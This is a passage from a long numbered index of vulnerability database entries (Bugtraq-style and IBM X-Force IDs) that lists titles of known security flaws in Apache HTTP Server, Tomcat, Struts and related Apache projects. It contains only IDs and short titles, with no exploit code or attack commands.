14698| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
14699| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
14700| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
14701| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
14702| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
14703| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
14704| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
14705| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
14706| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
14707| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
14708| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
14709| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
14710| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
14711| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
14712| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
14713| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
14714| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
14715| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
14716| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
14717| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
14718| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
14719| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
14720| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
14721| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
14722| [20527] Apache Mod_TCL Remote Format String Vulnerability
14723| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
14724| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
14725| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
14726| [19106] Apache Tomcat Information Disclosure Vulnerability
14727| [18138] Apache James SMTP Denial Of Service Vulnerability
14728| [17342] Apache Struts Multiple Remote Vulnerabilities
14729| [17095] Apache Log4Net Denial Of Service Vulnerability
14730| [16916] Apache mod_python FileSession Code Execution Vulnerability
14731| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
14732| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
14733| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
14734| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
14735| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
14736| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
14737| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
14738| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
14739| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
14740| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
14741| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
14742| [15177] PHP Apache 2 Local Denial of Service Vulnerability
14743| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
14744| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
14745| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
14746| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
14747| [14106] Apache HTTP Request Smuggling Vulnerability
14748| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
14749| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
14750| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
14751| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
14752| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
14753| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
14754| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
14755| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
14756| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
14757| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
14758| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
14759| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
14760| [11471] Apache mod_include Local Buffer Overflow Vulnerability
14761| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
14762| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
14763| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
14764| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
14765| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
14766| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
14767| [11094] Apache mod_ssl Denial Of Service Vulnerability
14768| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
14769| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
14770| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
14771| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
14772| [10478] ClueCentral Apache Suexec Patch Security Weakness
14773| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
14774| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
14775| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
14776| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
14777| [9921] Apache Connection Blocking Denial Of Service Vulnerability
14778| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
14779| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
14780| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
14781| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
14782| [9733] Apache Cygwin Directory Traversal Vulnerability
14783| [9599] Apache mod_php Global Variables Information Disclosure Weakness
14784| [9590] Apache-SSL Client Certificate Forging Vulnerability
14785| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
14786| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
14787| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
14788| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
14789| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
14790| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
14791| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
14792| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
14793| [8898] Red Hat Apache Directory Index Default Configuration Error
14794| [8883] Apache Cocoon Directory Traversal Vulnerability
14795| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
14796| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
14797| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
14798| [8707] Apache htpasswd Password Entropy Weakness
14799| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
14800| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
14801| [8226] Apache HTTP Server Multiple Vulnerabilities
14802| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
14803| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
14804| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
14805| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
14806| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
14807| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
14808| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
14809| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
14810| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
14811| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
14812| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
14813| [7255] Apache Web Server File Descriptor Leakage Vulnerability
14814| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
14815| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
14816| [6939] Apache Web Server ETag Header Information Disclosure Weakness
14817| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
14818| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
14819| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
14820| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
14821| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
14822| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
14823| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
14824| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
14825| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
14826| [6117] Apache mod_php File Descriptor Leakage Vulnerability
14827| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
14828| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
14829| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
14830| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
14831| [5992] Apache HTDigest Insecure Temporary File Vulnerability
14832| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
14833| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
14834| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
14835| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
14836| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
14837| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
14838| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
14839| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
14840| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
14841| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
14842| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
14843| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
14844| [5485] Apache 2.0 Path Disclosure Vulnerability
14845| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
14846| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
14847| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
14848| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
14849| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
14850| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
14851| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
14852| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
14853| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
14854| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
14855| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
14856| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
14857| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
14858| [4437] Apache Error Message Cross-Site Scripting Vulnerability
14859| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
14860| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
14861| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
14862| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
14863| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
14864| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
14865| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
14866| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
14867| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
14868| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
14869| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
14870| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
14871| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
14872| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
14873| [3596] Apache Split-Logfile File Append Vulnerability
14874| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
14875| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
14876| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
14877| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
14878| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
14879| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
14880| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
14881| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
14882| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
14883| [3169] Apache Server Address Disclosure Vulnerability
14884| [3009] Apache Possible Directory Index Disclosure Vulnerability
14885| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
14886| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
14887| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
14888| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
14889| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
14890| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
14891| [2216] Apache Web Server DoS Vulnerability
14892| [2182] Apache /tmp File Race Vulnerability
14893| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
14894| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
14895| [1821] Apache mod_cookies Buffer Overflow Vulnerability
14896| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
14897| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
14898| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
14899| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
14900| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
14901| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
14902| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
14903| [1457] Apache::ASP source.asp Example Script Vulnerability
14904| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
14905| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
14906|
14907| IBM X-Force - https://exchange.xforce.ibmcloud.com:
14908| [86258] Apache CloudStack text fields cross-site scripting
14909| [85983] Apache Subversion mod_dav_svn module denial of service
14910| [85875] Apache OFBiz UEL code execution
14911| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
14912| [85871] Apache HTTP Server mod_session_dbd unspecified
14913| [85756] Apache Struts OGNL expression command execution
14914| [85755] Apache Struts DefaultActionMapper class open redirect
14915| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
14916| [85574] Apache HTTP Server mod_dav denial of service
14917| [85573] Apache Struts Showcase App OGNL code execution
14918| [85496] Apache CXF denial of service
14919| [85423] Apache Geronimo RMI classloader code execution
14920| [85326] Apache Santuario XML Security for C++ buffer overflow
14921| [85323] Apache Santuario XML Security for Java spoofing
14922| [85319] Apache Qpid Python client SSL spoofing
14923| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
14924| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
14925| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
14926| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
14927| [84952] Apache Tomcat CVE-2012-3544 denial of service
14928| [84763] Apache Struts CVE-2013-2135 security bypass
14929| [84762] Apache Struts CVE-2013-2134 security bypass
14930| [84719] Apache Subversion CVE-2013-2088 command execution
14931| [84718] Apache Subversion CVE-2013-2112 denial of service
14932| [84717] Apache Subversion CVE-2013-1968 denial of service
14933| [84577] Apache Tomcat security bypass
14934| [84576] Apache Tomcat symlink
14935| [84543] Apache Struts CVE-2013-2115 security bypass
14936| [84542] Apache Struts CVE-2013-1966 security bypass
14937| [84154] Apache Tomcat session hijacking
14938| [84144] Apache Tomcat denial of service
14939| [84143] Apache Tomcat information disclosure
14940| [84111] Apache HTTP Server command execution
14941| [84043] Apache Virtual Computing Lab cross-site scripting
14942| [84042] Apache Virtual Computing Lab cross-site scripting
14943| [83782] Apache CloudStack information disclosure
14944| [83781] Apache CloudStack security bypass
14945| [83720] Apache ActiveMQ cross-site scripting
14946| [83719] Apache ActiveMQ denial of service
14947| [83718] Apache ActiveMQ denial of service
14948| [83263] Apache Subversion denial of service
14949| [83262] Apache Subversion denial of service
14950| [83261] Apache Subversion denial of service
14951| [83259] Apache Subversion denial of service
14952| [83035] Apache mod_ruid2 security bypass
14953| [82852] Apache Qpid federation_tag security bypass
14954| [82851] Apache Qpid qpid::framing::Buffer denial of service
14955| [82758] Apache Rave User RPC API information disclosure
14956| [82663] Apache Subversion svn_fs_file_length() denial of service
14957| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
14958| [82641] Apache Qpid AMQP denial of service
14959| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
14960| [82618] Apache Commons FileUpload symlink
14961| [82360] Apache HTTP Server manager interface cross-site scripting
14962| [82359] Apache HTTP Server hostnames cross-site scripting
14963| [82338] Apache Tomcat log/logdir information disclosure
14964| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
14965| [82268] Apache OpenJPA deserialization command execution
14966| [81981] Apache CXF UsernameTokens security bypass
14967| [81980] Apache CXF WS-Security security bypass
14968| [81398] Apache OFBiz cross-site scripting
14969| [81240] Apache CouchDB directory traversal
14970| [81226] Apache CouchDB JSONP code execution
14971| [81225] Apache CouchDB Futon user interface cross-site scripting
14972| [81211] Apache Axis2/C SSL spoofing
14973| [81167] Apache CloudStack DeployVM information disclosure
14974| [81166] Apache CloudStack AddHost API information disclosure
14975| [81165] Apache CloudStack createSSHKeyPair API information disclosure
14976| [80518] Apache Tomcat cross-site request forgery security bypass
14977| [80517] Apache Tomcat FormAuthenticator security bypass
14978| [80516] Apache Tomcat NIO denial of service
14979| [80408] Apache Tomcat replay-countermeasure security bypass
14980| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
14981| [80317] Apache Tomcat slowloris denial of service
14982| [79984] Apache Commons HttpClient SSL spoofing
14983| [79983] Apache CXF SSL spoofing
14984| [79830] Apache Axis2/Java SSL spoofing
14985| [79829] Apache Axis SSL spoofing
14986| [79809] Apache Tomcat DIGEST security bypass
14987| [79806] Apache Tomcat parseHeaders() denial of service
14988| [79540] Apache OFBiz unspecified
14989| [79487] Apache Axis2 SAML security bypass
14990| [79212] Apache Cloudstack code execution
14991| [78734] Apache CXF SOAP Action security bypass
14992| [78730] Apache Qpid broker denial of service
14993| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
14994| [78563] Apache mod_pagespeed module unspecified cross-site scripting
14995| [78562] Apache mod_pagespeed module security bypass
14996| [78454] Apache Axis2 security bypass
14997| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
14998| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
14999| [78321] Apache Wicket unspecified cross-site scripting
15000| [78183] Apache Struts parameters denial of service
15001| [78182] Apache Struts cross-site request forgery
15002| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
15003| [77987] mod_rpaf module for Apache denial of service
15004| [77958] Apache Struts skill name code execution
15005| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
15006| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
15007| [77568] Apache Qpid broker security bypass
15008| [77421] Apache Libcloud spoofing
15009| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
15010| [77046] Oracle Solaris Apache HTTP Server information disclosure
15011| [76837] Apache Hadoop information disclosure
15012| [76802] Apache Sling CopyFrom denial of service
15013| [76692] Apache Hadoop symlink
15014| [76535] Apache Roller console cross-site request forgery
15015| [76534] Apache Roller weblog cross-site scripting
15016| [76152] Apache CXF elements security bypass
15017| [76151] Apache CXF child policies security bypass
15018| [75983] MapServer for Windows Apache file include
15019| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
15020| [75558] Apache POI denial of service
15021| [75545] PHP apache_request_headers() buffer overflow
15022| [75302] Apache Qpid SASL security bypass
15023| [75211] Debian GNU/Linux apache 2 cross-site scripting
15024| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
15025| [74871] Apache OFBiz FlexibleStringExpander code execution
15026| [74870] Apache OFBiz multiple cross-site scripting
15027| [74750] Apache Hadoop unspecified spoofing
15028| [74319] Apache Struts XSLTResult.java file upload
15029| [74313] Apache Traffic Server header buffer overflow
15030| [74276] Apache Wicket directory traversal
15031| [74273] Apache Wicket unspecified cross-site scripting
15032| [74181] Apache HTTP Server mod_fcgid module denial of service
15033| [73690] Apache Struts OGNL code execution
15034| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
15035| [73100] Apache MyFaces in directory traversal
15036| [73096] Apache APR hash denial of service
15037| [73052] Apache Struts name cross-site scripting
15038| [73030] Apache CXF UsernameToken security bypass
15039| [72888] Apache Struts lastName cross-site scripting
15040| [72758] Apache HTTP Server httpOnly information disclosure
15041| [72757] Apache HTTP Server MPM denial of service
15042| [72585] Apache Struts ParameterInterceptor security bypass
15043| [72438] Apache Tomcat Digest security bypass
15044| [72437] Apache Tomcat Digest security bypass
15045| [72436] Apache Tomcat DIGEST security bypass
15046| [72425] Apache Tomcat parameter denial of service
15047| [72422] Apache Tomcat request object information disclosure
15048| [72377] Apache HTTP Server scoreboard security bypass
15049| [72345] Apache HTTP Server HTTP request denial of service
15050| [72229] Apache Struts ExceptionDelegator command execution
15051| [72089] Apache Struts ParameterInterceptor directory traversal
15052| [72088] Apache Struts CookieInterceptor command execution
15053| [72047] Apache Geronimo hash denial of service
15054| [72016] Apache Tomcat hash denial of service
15055| [71711] Apache Struts OGNL expression code execution
15056| [71654] Apache Struts interfaces security bypass
15057| [71620] Apache ActiveMQ failover denial of service
15058| [71617] Apache HTTP Server mod_proxy module information disclosure
15059| [71508] Apache MyFaces EL security bypass
15060| [71445] Apache HTTP Server mod_proxy security bypass
15061| [71203] Apache Tomcat servlets privilege escalation
15062| [71181] Apache HTTP Server ap_pregsub() denial of service
15063| [71093] Apache HTTP Server ap_pregsub() buffer overflow
15064| [70336] Apache HTTP Server mod_proxy information disclosure
15065| [69804] Apache HTTP Server mod_proxy_ajp denial of service
15066| [69472] Apache Tomcat AJP security bypass
15067| [69396] Apache HTTP Server ByteRange filter denial of service
15068| [69394] Apache Wicket multi window support cross-site scripting
15069| [69176] Apache Tomcat XML information disclosure
15070| [69161] Apache Tomcat jsvc information disclosure
15071| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
15072| [68541] Apache Tomcat sendfile information disclosure
15073| [68420] Apache XML Security denial of service
15074| [68238] Apache Tomcat JMX information disclosure
15075| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
15076| [67804] Apache Subversion control rules information disclosure
15077| [67803] Apache Subversion control rules denial of service
15078| [67802] Apache Subversion baselined denial of service
15079| [67672] Apache Archiva multiple cross-site scripting
15080| [67671] Apache Archiva multiple cross-site request forgery
15081| [67564] Apache APR apr_fnmatch() denial of service
15082| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
15083| [67515] Apache Tomcat annotations security bypass
15084| [67480] Apache Struts s:submit information disclosure
15085| [67414] Apache APR apr_fnmatch() denial of service
15086| [67356] Apache Struts javatemplates cross-site scripting
15087| [67354] Apache Struts Xwork cross-site scripting
15088| [66676] Apache Tomcat HTTP BIO information disclosure
15089| [66675] Apache Tomcat web.xml security bypass
15090| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
15091| [66241] Apache HttpComponents information disclosure
15092| [66154] Apache Tomcat ServletSecurity security bypass
15093| [65971] Apache Tomcat ServletSecurity security bypass
15094| [65876] Apache Subversion mod_dav_svn denial of service
15095| [65343] Apache Continuum unspecified cross-site scripting
15096| [65162] Apache Tomcat NIO connector denial of service
15097| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
15098| [65160] Apache Tomcat HTML Manager interface cross-site scripting
15099| [65159] Apache Tomcat ServletContect security bypass
15100| [65050] Apache CouchDB web-based administration UI cross-site scripting
15101| [64773] Oracle HTTP Server Apache Plugin unauthorized access
15102| [64473] Apache Subversion blame -g denial of service
15103| [64472] Apache Subversion walk() denial of service
15104| [64407] Apache Axis2 CVE-2010-0219 code execution
15105| [63926] Apache Archiva password privilege escalation
15106| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
15107| [63493] Apache Archiva credentials cross-site request forgery
15108| [63477] Apache Tomcat HttpOnly session hijacking
15109| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
15110| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
15111| [62959] Apache Shiro filters security bypass
15112| [62790] Apache Perl cgi module denial of service
15113| [62576] Apache Qpid exchange denial of service
15114| [62575] Apache Qpid AMQP denial of service
15115| [62354] Apache Qpid SSL denial of service
15116| [62235] Apache APR-util apr_brigade_split_line() denial of service
15117| [62181] Apache XML-RPC SAX Parser information disclosure
15118| [61721] Apache Traffic Server cache poisoning
15119| [61202] Apache Derby BUILTIN authentication functionality information disclosure
15120| [61186] Apache CouchDB Futon cross-site request forgery
15121| [61169] Apache CXF DTD denial of service
15122| [61070] Apache Jackrabbit search.jsp SQL injection
15123| [61006] Apache SLMS Quoting cross-site request forgery
15124| [60962] Apache Tomcat time cross-site scripting
15125| [60883] Apache mod_proxy_http information disclosure
15126| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
15127| [60264] Apache Tomcat Transfer-Encoding denial of service
15128| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
15129| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
15130| [59413] Apache mod_proxy_http timeout information disclosure
15131| [59058] Apache MyFaces unencrypted view state cross-site scripting
15132| [58827] Apache Axis2 xsd file include
15133| [58790] Apache Axis2 modules cross-site scripting
15134| [58299] Apache ActiveMQ queueBrowse cross-site scripting
15135| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
15136| [58056] Apache ActiveMQ .jsp source code disclosure
15137| [58055] Apache Tomcat realm name information disclosure
15138| [58046] Apache HTTP Server mod_auth_shadow security bypass
15139| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
15140| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
15141| [57429] Apache CouchDB algorithms information disclosure
15142| [57398] Apache ActiveMQ Web console cross-site request forgery
15143| [57397] Apache ActiveMQ createDestination.action cross-site scripting
15144| [56653] Apache HTTP Server DNS spoofing
15145| [56652] Apache HTTP Server DNS cross-site scripting
15146| [56625] Apache HTTP Server request header information disclosure
15147| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
15148| [56623] Apache HTTP Server mod_proxy_ajp denial of service
15149| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
15150| [55857] Apache Tomcat WAR files directory traversal
15151| [55856] Apache Tomcat autoDeploy attribute security bypass
15152| [55855] Apache Tomcat WAR directory traversal
15153| [55210] Intuit component for Joomla! Apache information disclosure
15154| [54533] Apache Tomcat 404 error page cross-site scripting
15155| [54182] Apache Tomcat admin default password
15156| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
15157| [53666] Apache HTTP Server Solaris pollset support denial of service
15158| [53650] Apache HTTP Server HTTP basic-auth module security bypass
15159| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
15160| [53041] mod_proxy_ftp module for Apache denial of service
15161| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
15162| [51953] Apache Tomcat Path Disclosure
15163| [51952] Apache Tomcat Path Traversal
15164| [51951] Apache stronghold-status Information Disclosure
15165| [51950] Apache stronghold-info Information Disclosure
15166| [51949] Apache PHP Source Code Disclosure
15167| [51948] Apache Multiviews Attack
15168| [51946] Apache JServ Environment Status Information Disclosure
15169| [51945] Apache error_log Information Disclosure
15170| [51944] Apache Default Installation Page Pattern Found
15171| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
15172| [51942] Apache AXIS XML External Entity File Retrieval
15173| [51941] Apache AXIS Sample Servlet Information Leak
15174| [51940] Apache access_log Information Disclosure
15175| [51626] Apache mod_deflate denial of service
15176| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
15177| [51365] Apache Tomcat RequestDispatcher security bypass
15178| [51273] Apache HTTP Server Incomplete Request denial of service
15179| [51195] Apache Tomcat XML information disclosure
15180| [50994] Apache APR-util xml/apr_xml.c denial of service
15181| [50993] Apache APR-util apr_brigade_vprintf denial of service
15182| [50964] Apache APR-util apr_strmatch_precompile() denial of service
15183| [50930] Apache Tomcat j_security_check information disclosure
15184| [50928] Apache Tomcat AJP denial of service
15185| [50884] Apache HTTP Server XML ENTITY denial of service
15186| [50808] Apache HTTP Server AllowOverride privilege escalation
